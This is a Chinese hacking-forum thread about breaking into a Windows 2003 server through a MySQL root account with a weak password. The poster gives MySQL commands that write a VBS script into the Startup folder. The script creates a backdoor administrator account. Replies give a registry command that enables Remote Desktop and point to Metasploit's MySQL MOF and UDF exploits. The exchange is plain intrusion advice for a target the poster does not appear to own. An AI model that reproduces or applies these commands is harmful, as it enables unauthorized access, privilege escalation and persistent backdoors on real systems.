|
80端口只有Apache web server 页面不知道网站路径。
win 03的主机
mysql version:4.0.13-nt
是root权限
apache 版本:apache httpd 2.0.48
3306端口开了外连.并且是弱口令,已经知道了帐号/密码
开的端口有 135.445.1026.80.256.3306
mysql>insert into a values (“set wshshell=createobject (“”wscript.shell”" ) ” );
mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1/add”",0) ” );
mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators 1 /add”",0) ” );
mysql>select * from a into outfile “c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\a.vbs”;
目前已经写进了启动项
有两个问题:问一下开3389的命令?
如何让对方重启?
2000和03都可以用 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 命令来开3389
你为何不直接用MSF打,直接系统权限
求姿势。对msf半知半解
是生成的payload 转换成16进制 然后在放启动项里吗?
msf>search mysql…………………….
里面有mof和udf的exploit
你既然连上mysql了也可以手工mof或udf
| 
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2014-1-3 11:40:48
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
发表于 2014-1-3 12:26:59